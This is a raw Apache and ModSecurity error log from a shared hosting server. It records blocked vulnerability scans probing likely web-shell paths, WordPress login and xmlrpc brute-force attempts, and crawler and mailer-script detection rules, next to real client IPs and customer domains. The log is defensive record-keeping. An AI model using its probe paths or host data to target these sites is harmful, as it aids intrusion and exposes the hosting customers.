[Tue May 26 13:01:11.037375 2026] [security2:error] [pid 470766:tid 470942] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMPujO_W1DqEcFHQ7njwAAAC4"]
[Tue May 26 13:01:11.062165 2026] [security2:error] [pid 470766:tid 471013] [client 4.201.75.230:5363] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/class.php"] [unique_id "ahVMP-jO_W1DqEcFHQ7nmQAAAHU"]
[Tue May 26 13:01:11.222393 2026] [security2:error] [pid 470766:tid 470896] [client 138.2.67.134:20816] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMPujO_W1DqEcFHQ7nhgAAAAA"]
[Tue May 26 13:01:11.222457 2026] [security2:error] [pid 470766:tid 470896] [client 138.2.67.134:20816] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMPujO_W1DqEcFHQ7nhgAAAAA"]
[Tue May 26 13:01:12.162104 2026] [security2:error] [pid 470766:tid 471020] [client 4.201.75.230:5364] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/aw.php"] [unique_id "ahVMQOjO_W1DqEcFHQ7nuQAAAHw"]
[Tue May 26 13:01:12.336363 2026] [security2:error] [pid 470766:tid 470825] [remote 209.42.20.53:58340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.20.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVMQOjO_W1DqEcFHQ7nuAAAKTo"]
[Tue May 26 13:01:13.317908 2026] [security2:error] [pid 470766:tid 471022] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMQOjO_W1DqEcFHQ7nywAAAH4"]
[Tue May 26 13:01:14.746712 2026] [security2:error] [pid 470766:tid 470951] [client 157.20.138.61:57727] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMQujO_W1DqEcFHQ7n_QAAADc"]
[Tue May 26 13:01:14.746839 2026] [security2:error] [pid 470766:tid 470951] [client 157.20.138.61:57727] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMQujO_W1DqEcFHQ7n_QAAADc"]
[Tue May 26 13:01:14.842062 2026] [security2:error] [pid 470766:tid 470890] [remote 172.194.139.254:13808] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.139.194.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahVMQujO_W1DqEcFHQ7n_AAAPXs"]
[Tue May 26 13:01:14.941971 2026] [security2:error] [pid 470766:tid 470992] [client 138.2.67.134:44828] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMQujO_W1DqEcFHQ7oBQAAAGA"]
[Tue May 26 13:01:15.393738 2026] [security2:error] [pid 470766:tid 470998] [client 78.46.215.1:52006] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVMQujO_W1DqEcFHQ7oBAAAAGY"], referer: https://thegoodsporting.com
[Tue May 26 13:01:15.556586 2026] [security2:error] [pid 470766:tid 470992] [client 138.2.67.134:44828] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMQujO_W1DqEcFHQ7oBQAAAGA"]
[Tue May 26 13:01:15.849124 2026] [security2:error] [pid 470766:tid 470979] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMQ-jO_W1DqEcFHQ7oFgAAAFM"]
[Tue May 26 13:01:15.988128 2026] [proxy:error] [pid 470766:tid 471006] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:01:15.988190 2026] [proxy_http:error] [pid 470766:tid 471006] [client 104.28.222.46:33333] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:01:15.989043 2026] [proxy:error] [pid 470766:tid 471006] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:01:15.989082 2026] [proxy_http:error] [pid 470766:tid 471006] [client 104.28.222.46:33333] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:01:17.135007 2026] [proxy:error] [pid 470766:tid 470909] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:01:17.135102 2026] [proxy_http:error] [pid 470766:tid 470909] [client 104.28.222.46:28068] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:01:17.135768 2026] [proxy:error] [pid 470766:tid 470909] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:01:17.135834 2026] [proxy_http:error] [pid 470766:tid 470909] [client 104.28.222.46:28068] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:01:18.071910 2026] [security2:error] [pid 470766:tid 470842] [remote 88.198.91.116:52200] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.91.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahVMRejO_W1DqEcFHQ7oUwAADks"]
[Tue May 26 13:01:18.299822 2026] [security2:error] [pid 470766:tid 470974] [client 14.234.188.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMRejO_W1DqEcFHQ7oUgAAAE4"]
[Tue May 26 13:01:18.377180 2026] [security2:error] [pid 470766:tid 470841] [remote 47.128.98.218:12594] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "grandconclaveindia.org.in"] [uri "/gci-ranks-past.php"] [unique_id "ahVMRujO_W1DqEcFHQ7oXgAAQEo"]
[Tue May 26 13:01:18.551444 2026] [security2:error] [pid 470766:tid 470918] [client 138.2.67.134:44838] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMRujO_W1DqEcFHQ7oXwAAABY"]
[Tue May 26 13:01:19.003980 2026] [security2:error] [pid 470766:tid 470954] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMRujO_W1DqEcFHQ7oYgAAADo"]
[Tue May 26 13:01:19.177089 2026] [security2:error] [pid 470766:tid 470918] [client 138.2.67.134:44838] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMRujO_W1DqEcFHQ7oXwAAABY"]
[Tue May 26 13:01:21.609317 2026] [security2:error] [pid 470766:tid 470989] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMSejO_W1DqEcFHQ7okAAAAF0"]
[Tue May 26 13:01:22.099897 2026] [security2:error] [pid 470766:tid 471013] [client 138.2.67.134:44844] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMSujO_W1DqEcFHQ7oowAAAHU"]
[Tue May 26 13:01:22.720963 2026] [security2:error] [pid 470766:tid 471013] [client 138.2.67.134:44844] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMSujO_W1DqEcFHQ7oowAAAHU"]
[Tue May 26 13:01:23.585472 2026] [security2:error] [pid 470766:tid 470937] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMS-jO_W1DqEcFHQ7ouwAAACk"]
[Tue May 26 13:01:24.470370 2026] [security2:error] [pid 470766:tid 470947] [client 4.201.75.230:5334] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/bb.php"] [unique_id "ahVMTOjO_W1DqEcFHQ7o0wAAADM"]
[Tue May 26 13:01:25.368236 2026] [security2:error] [pid 470766:tid 471022] [client 138.2.67.134:10786] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMTejO_W1DqEcFHQ7o5AAAAH4"]
[Tue May 26 13:01:25.496683 2026] [security2:error] [pid 470766:tid 470948] [client 157.20.138.61:58092] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMTejO_W1DqEcFHQ7o5QAAADQ"]
[Tue May 26 13:01:25.496920 2026] [security2:error] [pid 470766:tid 470948] [client 157.20.138.61:58092] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMTejO_W1DqEcFHQ7o5QAAADQ"]
[Tue May 26 13:01:25.998061 2026] [security2:error] [pid 470766:tid 471022] [client 138.2.67.134:10786] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMTejO_W1DqEcFHQ7o5AAAAH4"]
[Tue May 26 13:01:26.676042 2026] [security2:error] [pid 470766:tid 470928] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMTujO_W1DqEcFHQ7pBAAAACA"]
[Tue May 26 13:01:26.911254 2026] [security2:error] [pid 470766:tid 470864] [remote 211.23.68.235:19227] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahVMTujO_W1DqEcFHQ7pEQAAKmE"]
[Tue May 26 13:01:28.869987 2026] [security2:error] [pid 470766:tid 470967] [client 4.201.75.230:5322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/222.php"] [unique_id "ahVMUOjO_W1DqEcFHQ7pQAAAAEc"]
[Tue May 26 13:01:29.204297 2026] [security2:error] [pid 470766:tid 470965] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMUOjO_W1DqEcFHQ7pOgAAAEU"]
[Tue May 26 13:01:29.291708 2026] [security2:error] [pid 470766:tid 471018] [client 138.2.67.134:10794] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMUejO_W1DqEcFHQ7pRAAAAHo"]
[Tue May 26 13:01:29.992137 2026] [security2:error] [pid 470766:tid 471018] [client 138.2.67.134:10794] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMUejO_W1DqEcFHQ7pRAAAAHo"]
[Tue May 26 13:01:29.992198 2026] [security2:error] [pid 470766:tid 471018] [client 138.2.67.134:10794] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMUejO_W1DqEcFHQ7pRAAAAHo"]
[Tue May 26 13:01:32.081654 2026] [security2:error] [pid 470766:tid 471005] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMU-jO_W1DqEcFHQ7pdQAAAG0"]
[Tue May 26 13:01:33.380267 2026] [proxy:error] [pid 470766:tid 470981] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:01:33.380341 2026] [proxy_http:error] [pid 470766:tid 470981] [client 104.28.222.46:63213] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:01:33.381289 2026] [proxy:error] [pid 470766:tid 470981] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:01:33.381335 2026] [proxy_http:error] [pid 470766:tid 470981] [client 104.28.222.46:63213] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:01:34.398103 2026] [security2:error] [pid 470766:tid 470968] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMVejO_W1DqEcFHQ7ptAAAAEg"]
[Tue May 26 13:01:34.625185 2026] [security2:error] [pid 470766:tid 470950] [client 138.2.67.134:10798] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMVujO_W1DqEcFHQ7pvQAAADY"]
[Tue May 26 13:01:35.244729 2026] [security2:error] [pid 470766:tid 470950] [client 138.2.67.134:10798] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMVujO_W1DqEcFHQ7pvQAAADY"]
[Tue May 26 13:01:35.938269 2026] [security2:error] [pid 470766:tid 471006] [client 157.20.138.61:58449] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMV-jO_W1DqEcFHQ7p5AAAAG4"]
[Tue May 26 13:01:35.938411 2026] [security2:error] [pid 470766:tid 471006] [client 157.20.138.61:58449] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMV-jO_W1DqEcFHQ7p5AAAAG4"]
[Tue May 26 13:01:37.162021 2026] [security2:error] [pid 470766:tid 470923] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMWOjO_W1DqEcFHQ7p-wAAABs"]
[Tue May 26 13:01:37.719411 2026] [security2:error] [pid 470766:tid 470798] [remote 18.209.220.99:31141] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.220.209.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahVMWejO_W1DqEcFHQ7qBgAADB8"]
[Tue May 26 13:01:38.244885 2026] [security2:error] [pid 470766:tid 470998] [client 138.2.67.134:59334] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMWujO_W1DqEcFHQ7qGQAAAGY"]
[Tue May 26 13:01:38.452929 2026] [security2:error] [pid 470766:tid 470797] [remote 147.47.107.157:45130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 157.107.47.147.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVMWujO_W1DqEcFHQ7qGgAAMh4"]
[Tue May 26 13:01:38.850546 2026] [security2:error] [pid 470766:tid 470998] [client 138.2.67.134:59334] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMWujO_W1DqEcFHQ7qGQAAAGY"]
[Tue May 26 13:01:38.870553 2026] [security2:error] [pid 470766:tid 470902] [client 4.201.75.230:5374] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/test1.php"] [unique_id "ahVMWujO_W1DqEcFHQ7qLgAAAAY"]
[Tue May 26 13:01:38.935271 2026] [security2:error] [pid 470766:tid 470907] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMWujO_W1DqEcFHQ7qIgAAAAs"]
[Tue May 26 13:01:40.788479 2026] [security2:error] [pid 470766:tid 470784] [remote 5.189.189.33:38818] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.189.189.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVMXOjO_W1DqEcFHQ7qWQAABBE"]
[Tue May 26 13:01:40.826375 2026] [security2:error] [pid 470766:tid 471008] [client 4.201.75.230:5370] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/css/autoload_classmap.php"] [unique_id "ahVMXOjO_W1DqEcFHQ7qXQAAAHA"]
[Tue May 26 13:01:40.879549 2026] [security2:error] [pid 470766:tid 470806] [remote 46.101.217.74:46940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.217.101.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVMXOjO_W1DqEcFHQ7qWAAAYic"]
[Tue May 26 13:01:41.536786 2026] [security2:error] [pid 470766:tid 471006] [client 138.2.67.134:59336] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMXejO_W1DqEcFHQ7qcQAAAG4"]
[Tue May 26 13:01:41.680485 2026] [security2:error] [pid 470766:tid 471022] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMXejO_W1DqEcFHQ7qbAAAAH4"]
[Tue May 26 13:01:41.762003 2026] [security2:error] [pid 470766:tid 470932] [client 165.140.119.146:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVMXejO_W1DqEcFHQ7qdAAAACQ"], referer: https://www.bloggertarget.com
[Tue May 26 13:01:41.815416 2026] [security2:error] [pid 470766:tid 470910] [client 4.201.75.230:5312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/fx.php"] [unique_id "ahVMXejO_W1DqEcFHQ7qfAAAAA4"]
[Tue May 26 13:01:42.130067 2026] [security2:error] [pid 470766:tid 471006] [client 138.2.67.134:59336] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMXejO_W1DqEcFHQ7qcQAAAG4"]
[Tue May 26 13:01:42.574579 2026] [security2:error] [pid 470766:tid 470921] [client 66.249.64.170:49735] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVMXejO_W1DqEcFHQ7qbQAAABk"], referer: https://doyecpa.com/prizes/227684965%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20class=
